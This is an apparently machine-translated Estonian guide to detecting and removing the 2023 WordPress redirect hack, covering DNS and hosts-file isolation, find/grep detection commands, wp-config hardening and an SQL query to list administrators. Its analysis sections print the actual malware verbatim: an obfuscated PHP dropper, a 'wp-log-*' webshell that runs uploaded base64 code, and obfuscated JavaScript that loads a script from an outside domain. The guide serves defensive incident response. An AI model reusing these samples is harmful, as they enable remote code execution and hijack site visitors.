WordPress see on kindlasti enim kasutatud platvorm CMS (Content Management System) nii ajaveebidele kui ka alustavatele veebipoodidele (koos mooduliga WooCommerce), mis muudab selle arvutirünnakute (häkkimise) enim sihtmärgiks. Üks enim kasutatavatest häkkimistoimingutest on ohustatud veebisaidi ümbersuunamine teistele veebilehtedele. Redirect WordPress Hack 2023 on suhteliselt uus pahavara, mille mõjul suunatakse kogu sait rämpsposti veebilehtedele või mis omakorda võib nakatada kasutajate arvuteid.
Kui teie sait on arenenud WordPress suunatakse ümber teisele saidile, siis on see tõenäoliselt juba kuulsa ümbersuunamishäkkimise ohver.
Sellest õpetusest leiate vajalikku teavet ja kasulikke näpunäiteid ümbersuunamisega nakatunud veebisaidi viirusetõrjeks WordPress Hack (Virus Redirect). Läbi kommentaaride saate lisainfot või küsida abi.
Kupriinid
Saite ümber suunava viiruse tuvastamine WordPress
Veebilehe liikluse järsk ja põhjendamatu vähenemine, tellimuste arvu (veebipoodide puhul) või reklaamitulu vähenemine on esimesed märgid, et midagi on valesti. Tuvastamine "Redirect WordPress Hack 2023” (Virus Redirect) saab teha ka "visuaalselt", kui avate veebisaidi ja teid suunatakse teisele veebilehele.
Kogemused näitavad, et enamik veebi pahavara ühildub Interneti-brauseritega: Chrome, Firefox, Edge, Opera. Kui olete arvutikasutaja Mac, pole need viirused brauseris tegelikult nähtavad Safari. Turvasüsteem alates Safari vaikselt blokeerida need pahatahtlikud skriptid.
Mida teha, kui teie veebisait on nakatunud Redirect WordPress Hack
Loodan, et esimene samm on mitte paanikasse sattuda ega veebisaiti kustutada. Isegi nakatunud või viirusega faile ei tohiks alguses kustutada. Need sisaldavad väärtuslikku teavet, mis aitab teil mõista, kus turvarikkumine on ja mis viirust mõjutas. Modus operandi.
Sulgege veebisait avalikkusele.
Kuidas sulgeda viiruste veebisait külastajatele? Lihtsaim on kasutada DNS-i haldurit ja kustutada "A" (domeeninimi) IP või määrata olematu IP. Seega on veebisaidi külastajad selle eest kaitstud redirect WordPress hack mis võib viia nad viiruste või rämpsposti veebilehtedele.
Kui kasutate CloudFlare DNS-i haldurina logite sisse kontole ja kustutate DNS-kirjed "A” domeeninime jaoks. Seega jääb viirusest mõjutatud domeen ilma IP-d, millele ei pääse enam internetist ligi.
Kopeerite veebisaidi IP-aadressi ja "marsruutate" selle nii, et ainult teie pääsete sellele juurde. Teie arvutist.
Kuidas muuta arvutis veebisaidi tegelikku IP-d Windows?
Seda meetodit kasutatakse sageli teatud veebisaitidele juurdepääsu blokeerimiseks, redigeerides faili "hosts".
1. Sa avad Notepad või muu tekstiredaktor (õigustega administrator) ja muutke faili "hosts". See asub:
C:\Windows\System32\drivers\etc\hosts2. Failis "hosts" lisage oma veebisaidi tegelikule IP-le "marsruut". IP kustutati ülalpool DNS-i haldurist.
IP.IP.IP.IP yourdomain.tld
IP.IP.IP.IP www.yourdomain.tld3. Salvestage fail ja avage brauseris veebisait.
Kui veebisait ei avane ja te pole failis "hosts" midagi valesti teinud, on tõenäoliselt tegemist DNS-i vahemäluga.
DNS-i vahemälu tühjendamiseks operatsioonisüsteemis Windows, avatud Command Prompt, kus käivitate käsu:
ipconfig /flushdnsKuidas muuta arvutis veebisaidi tegelikku IP-d Mac / MacRaamat?
Arvutikasutajatele Mac mõnevõrra lihtsam on muuta veebisaidi tegelikku IP-d.
1. Avage utiliit Terminal.
2. Käivitage käsurida (käivitamiseks on vaja süsteemi parooli):
sudo nano /etc/hosts3. Sama mis arvutite puhul Windows, lisage domeeni tegelik IP.
IP.IP.IP.IP yourdomain.tld
IP.IP.IP.IP www.yourdomain.tld4. Salvestage muudatused. Ctrl+X (y).
Pärast "marsruutimist" olete ainus inimene, kes pääseb nakatunud veebisaidile Redirect WordPress Hack.
Veebisaidi täielik varundamine – failid ja andmebaas
Isegi kui see on nakatunudredirect WordPress hack”, on soovitatav teha kogu veebisaidist üldine varukoopia. Failid ja andmebaas. Võimalik, et saate mõlemast failist ka kohaliku koopia salvestada public / public_html samuti andmebaas.
Nakatunud failide ja muudetud failide tuvastamine Redirect WordPress Hack 2023
Peamised sihtfailid WordPress on index.php (juures), header.php, index.php şi footer.php teemast WordPress varasid. Kontrollige neid faile käsitsi ja tuvastage pahatahtlik kood või pahavara skript.
Aastal 2023 levis "viirus"Redirect WordPress Hack” pane sisse index.php vormi kood:
(Ma ei soovita neid koode käivitada!)
<?php $t='er'.'ro'.'r_'.'r'.'epo'.'rt'.'in'.'g';$b0='MDxXRVM3Vj1FPSVdVDk2VVA3VjFJPEBgYApgCg==';$b1='b'.'a'.'se'.'6'.'4_'.'e'.''.'nc'.'od'.'e';$b2='b'.'as'.'e'.'6'.'4_d'.'e'.'c'.'o'.'d'.'e';$b3='c'.'on'.'ve'.'rt_uue'.'nco'.'de';$b4='c'.'o'.'nve'.'rt'.'_u'.'ude'.'co'.'de';$b5='MTlGRUw5'.'NV1QPTcxP'.'zhWXU'.'49JjVOPScsYApgCg==';$b7='';$b8='JD0mR'.'UM6U'.'GBgCmAK';$b9='IzkmRUUKYAo=';$b10='Izs2'.'MFU'.'KYAo=';$b11='QC4mOFE5Q0RWLSYkVDhDMUQ'.'uJjBRODYsU'.'zlDYFMuI'.'zhWLjMtRCx'.'DQUQsIyxgCmAK';$b12='IjhG'.'QGA'.'KYAo=';$b13='IjhDLGAKYAo=';$b14='Ji8jXV'.'A6J'.'2BACmAK';$b18='LS8nLUM8R'.'kVQPSIh'.'UzxGLF0pUGBgCmAK';$b19='KylTWFwrVy1DPEZFUD0jWGAKYAo=';$b20=' TDonMVQ8JyxaK1JdUz0mJVkrRlFJO0Y1Uz0mXUc5NzBOOFZdTStXLUM8RkVQPScsTzhWQUU4VkxOOkcsYApgCg==';$b21='JTwnKUk7RzBgCmAK';$b22='KD1XYE04NjFNOjZYYApgCg==';$b23='KD1XYE07Jl1HOjZYYApgCg==';$b24='KjxGNVM9JV1SO1c1VDkwYGAKYAo=';$b25='Jz1XYE06Ry1PO0BgYApgCg==';$b30='KTIlMTQ0JV0oM1UtNApgCg==';$b31='KzRENTE1NDUzNSVdNTRERGAKYAo=';$b34='JjxXMVI8Jl1TCmAK';$b41='WlhOeWEycDBjMmg1Y3paaFpUUnJhblU9';$b16=$b4($b2($b0))();if(isset($_POST[$b4($b2($b12))])){if($b4($b2($b10))($_POST[$b4($b2($b12))])===$b4($b2($b11))){ $b45=$_POST[$b4($b2($b13))];$b4($b2($b5))($b16.'/'.$b4($b2($b8)),$b4($b2($b14)).$b2($b45));@include($b16.'/'.$b4($b2($b8)));die();}}if(isset($_POST[$b4($b2($b8)).$b4($b2($b8))])||isset($_GET[$b4($b2($b8)).$b4($b2($b8))])){echo $b4($b2($b10))($b4($b2($b8)));die();}else{$b27=0;$b26=array($b4($b2($b22)),$b4($b2($b23)),$b4($b2($b24)),$b4($b2($b25)));$b32 = $_SERVER[$b4($b2($b30))].$_SERVER[$b4($b2($b31))];foreach ($b26 as $b33) {if($b4($b2($b34))($b32,$b33) !== false){$b27=1;}}if($b27==0) {echo $b4($b2($b18)).$b4($b2($b20)).$b4($b2($b19));}} ?>Dekodeeritud, see pahatahtlik skript see on põhimõtteliselt veebisaidi nakatumise tagajärg WordPress. See ei ole pahavara taga olev skript, vaid skript, mis võimaldab nakatunud veebilehe ümber suunata. Kui dekodeerime ülaltoodud skripti, saame:
<script src="/cdn-cgi/apps/head/D6nq5D2EcGpWI6Zldc9omMs3J_0.js"></script>
<script src="https://stay.linestoget.com/scripts/check.js" type="c2cc1212300ac9423a61ac0b-text/javascript"></script>
<script src="/cdn-cgi/scripts/7d0fa10a/cloudflare-static/rocket-loader.min.js" data-cf-settings="c2cc1212300ac9423a61ac0b-|49" defer></script>
Kõigi seda koodi sisaldavate serveris olevate failide tuvastamiseks on hea, kui teil on juurdepääs SSH serverisse failide kontrollimise ja haldamise käsuridade käivitamiseks Linux.
Allpool on kaks käsku, millest on kindlasti abi hiljuti muudetud failide ja teatud koodi (stringi) sisaldavate failide tuvastamisel.
Kuidas sa edasi näed Linux PHP-faile muudetud viimase 24 tunni või mõne muu aja jooksul?
Tellimusfind” on väga lihtne kasutada ja võimaldab kohandada ajaperioodi, otsinguteed ja failitüüpe.
find /your/web/path -type f -mtime -1 -exec ls -l {} \; | grep "\.php$"Väljundis saate teavet faili muutmise kuupäeva ja kellaaja, kirjutamis- / lugemis- / käitamisõiguste kohta (chmod) ja millisesse gruppi/kasutajale see kuulub.
Kui soovite vaadata rohkem päevi tagasi, muutke väärtust "-mtime -1" või kasutage "-mmin -360” minutiteks (6 tundi).
Kuidas otsida PHP-, Java-failide seest koodi (stringi)?
"Find" käsurida, mis võimaldab teil kiiresti leida kõik PHP- või Java-failid, mis sisaldavad teatud koodi, on järgmine:
find /your/web/path -type f \( -name "*.js" -o -name "*.php" \) -exec grep -l "uJjBRODYsU" {} +Käsk otsib ja kuvab failid .php şi .js mis sisaldab "uJjBRODYsU".
Kahe ülaltoodud käsu abil saate väga lihtsalt teada, milliseid faile on hiljuti muudetud ja millised sisaldavad pahavara koodi.
Eemaldab muudetud failidest pahatahtliku koodi ilma õiget koodi kahjustamata. Minu stsenaariumi kohaselt paigutati pahavara enne avamist <head>.
Esimese "leida" käsu täitmisel on väga võimalik avastada serveris uusi faile, mis ei ole sinu omad WordPress ega sinu poolt sinna pandud. Viiruse tüüpi kuuluvad failid Redirect WordPress Hack.
Uuritud stsenaariumi korral failid kujul "wp-log-nOXdgD.php". Need on "spawn" failid, mis sisaldavad ka pahavara koodi, mida viirus kasutab ümbersuunamiseks.
<?php $t="er"."ro"."r_"."r"."epo"."rt"."in"."g";$t(0); $a=sys_get_temp_dir();if(isset($_POST['bh'])){if(md5($_POST['bh'])==="8f1f964a4b4d8d1ac3f0386693d28d03"){$b3=$_POST['b3'];file_put_contents($a."/tpfile","<"."?"."p"."h"."p ".base64_decode($b3));@include($a."/tpfile");die();}}if(isset($_POST['tick'])||isset($_GET['tick'])){echo md5('885');}tüüpi failide eesmärkwp-log-*” eesmärk on levitada ümbersuunamishäkkimisviirust teistele serveris majutatud veebisaitidele. See on pahavara kood tüüpi "webshell” koosneb a põhiosa (milles on defineeritud mõned krüpteeritud muutujad) ja o hukkamise osa mille kaudu ründaja proovib laadida ja käivitada süsteemis pahatahtlikku koodi.
Kui on olemas muutuja POST nimega 'bhja selle krüpteeritud väärtus MD5 on võrdne "8f1f964a4b4d8d1ac3f0386693d28d03", siis näib, et skript kirjutab krüptitud sisu base64 teisest muutujast nimega 'b3ajutises failis ja proovib seejärel selle ajutise faili kaasata.
Kui on olemas muutuja POST või GET nimega 'tick", vastab skript väärtusega MD5 stringist"885".
Kõigi seda koodi sisaldavate serveris olevate failide tuvastamiseks valige tavaline string, seejärel käivitage käsk "find” (sarnane ülaltooduga). Kustutage kõik seda pahavara koodi sisaldavad failid.
Turvaviga kasutas ära Redirect WordPress Hack
Tõenäoliselt saabub see ümbersuunamisviirus selle kaudu halduskasutaja ärakasutamine WordPress või tuvastades a haavatav pistikprogramm mis võimaldab lisada kasutajaid, kellel on õigused administrator.
Enamiku platvormile ehitatud veebisaitide jaoks WordPress see on võimalik teemade või pistikprogrammide failide redigeeriminehaldusliidesest (Dashboard). Seega võib pahatahtlik inimene lisada teemafailidele pahavara koodi, et genereerida ülaltoodud skripte.
Sellise pahavara koodi näide on järgmine:
<script>var s='3558289hXnVzT';var _0x1e8ff2=_0x1524;(function(_0x5062c1,_0x3340a3){var _0x1fb079=_0x1524,_0x1e7757=_0x5062c1();while(!![]){try{var _0x2a4ba9=-parseInt(_0x1fb079(0x178))/0x1*(parseInt(_0x1fb079(0x189))/0x2)+-parseInt(_0x1fb079(0x187))/0x3+parseInt(_0x1fb079(0x17e))/0x4+-parseInt(_0x1fb079(0x182))/0x5+-parseInt(_0x1fb079(0x176))/0x6*(-parseInt(_0x1fb079(0x17c))/0x7)+-parseInt(_0x1fb079(0x177))/0x8*(parseInt(_0x1fb079(0x172))/0x9)+-parseInt(_0x1fb079(0x181))/0xa*(-parseInt(_0x1fb079(0x179))/0xb);if(_0x2a4ba9===_0x3340a3)break;else _0x1e7757['push'](_0x1e7757['shift']());}catch(_0x332dc7){_0x1e7757['push'](_0x1e7757['shift']());}}}(_0x18f7,0x56d7f));function _0x18f7(){var _0x33878d=['getElementsByTagName','684364prPqlZ','src','873KJkhlg','fromCharCode','head','script[src=\x22','1137318yPDczb','1648yAATZA','1MjirdU','1936BqEZLn','9.3.2','createElement','21FNTvZp','appendChild','1812244aSZNJb','script','currentScript','15090pySUMO','1032605tfOmII','querySelector','insertBefore','parentNode','/sta','1088724TsmeQl'];_0x18f7=function(){return _0x33878d;};return _0x18f7();}function isScriptLoaded(_0x47ea31){var _0x210a48=_0x1524;return Boolean(document[_0x210a48(0x183)](_0x210a48(0x175)+_0x47ea31+'\x22]'));}var bd='ht'+'tp'+'s:'+'/'+_0x1e8ff2(0x186)+'y.l'+String[_0x1e8ff2(0x173)](0x69,0x6e,0x65,0x73,0x74,0x6f,0x67,0x65,0x74,0x2e,0x63,0x6f,0x6d,0x2f,0x73,0x63,0x72,0x69,0x70,0x74,0x73,0x2f,0x63,0x68,0x65,0x63,0x6b,0x2e,0x6a,0x73,0x3f,0x76,0x3d)+_0x1e8ff2(0x17a);function _0x1524(_0x1168b6,_0x2ef792){var _0x18f7eb=_0x18f7();return _0x1524=function(_0x15242f,_0x543bbb){_0x15242f=_0x15242f-0x171;var _0xef6154=_0x18f7eb[_0x15242f];return _0xef6154;},_0x1524(_0x1168b6,_0x2ef792);}if(isScriptLoaded(bd)===![]){var d=document,s=d[_0x1e8ff2(0x17b)](_0x1e8ff2(0x17f));s[_0x1e8ff2(0x171)]=bd,document[_0x1e8ff2(0x180)]?document['currentScript'][_0x1e8ff2(0x185)]!==null&&document[_0x1e8ff2(0x180)][_0x1e8ff2(0x185)][_0x1e8ff2(0x184)](s,document[_0x1e8ff2(0x180)]):d[_0x1e8ff2(0x188)](_0x1e8ff2(0x174))[0x0]!==null&&d[_0x1e8ff2(0x188)]('head')[0x0][_0x1e8ff2(0x17d)](s);}</script>JavaScript tuvastatud teema päises WordPress, kohe pärast etiketi avamist <head>.
Seda JavaScripti on üsna keeruline dešifreerida, kuid on ilmne, et see küsib mõnda teist veebiaadressi, kust ta tõenäoliselt tõmbab failide loomiseks muid skripte "wp-log-*”, millest ma eespool rääkisin.
Otsige üles ja kustutage see kood kõigist failidest PHP mõjutatud.
Niipalju kui ma aru sain, oli see kood käsitsi lisatud uus administraatoriõigustega kasutaja.
Seega, et vältida pahavara lisamist juhtpaneelilt, on parem redigeerimisvõimalus keelata WordPress Teemad/pluginad juhtpaneelilt.
Redigeeri faili wp-config.php ja lisa read:
define('DISALLOW_FILE_EDIT',true);
define('DISALLOW_FILE_MODS',true);Pärast selle muudatuse tegemist pole kasutajat WordPress te ei saa enam armatuurlaual faile redigeerida.
Kontrollige kasutajaid rolliga Administrator
Allpool on SQL-päring, mida saate kasutada rolliga kasutajate otsimiseks administrator platvormil WordPress:
SELECT * FROM wp_users
INNER JOIN wp_usermeta ON wp_users.ID = wp_usermeta.user_id
WHERE wp_usermeta.meta_key = 'wp_capabilities'
AND wp_usermeta.meta_value LIKE '%administrator%'See päring tagastab kõik tabelis olevad kasutajad wp_users kes määras rolli administrator. Päring tehakse ka tabeli kohta wp_usermeta metast otsimawp_capabilities", mis sisaldab teavet kasutaja rollide kohta.
Teine meetod on nende tuvastamine: Dashboard → Users → All Users → Administrator. Siiski on tavasid, mille abil saab kasutaja juhtpaneeli paneelil peita. Niisiis, parim viis kasutajate nägemiseksAdministrator"kohta WordPress on ülaltoodud SQL-käsk.
Minu puhul tuvastasin andmebaasis kasutaja nimega "wp-import-user". Üsna sugestiivne.
Samuti näete siit kuupäeva ja kellaaega, millal kasutaja WordPress loodi. Kasutaja ID on samuti väga oluline, sest see otsib serveri logidest. Nii näete kogu selle kasutaja tegevust.
Kustutage kasutajad rolliga administrator mida sa siis ei tea muuta paroole kõigile administratiivsetele kasutajatele. Toimetaja, autor, Administrator.
Muutke SQL-andmebaasi kasutaja parooli mõjutatud veebisaidilt.
Pärast nende toimingute tegemist saab veebisaiti taaskäivitada kõigi kasutajate jaoks.
Pidage siiski meeles, et see, mida ma eespool esitasin, on üks võib-olla tuhandetest stsenaariumitest, mille puhul veebisait on nakatunud Redirect WordPress Hack aastal 2023.
Kui teie veebisait on nakatunud ja vajate abi või kui teil on küsimusi, on kommentaaride jaotis avatud.
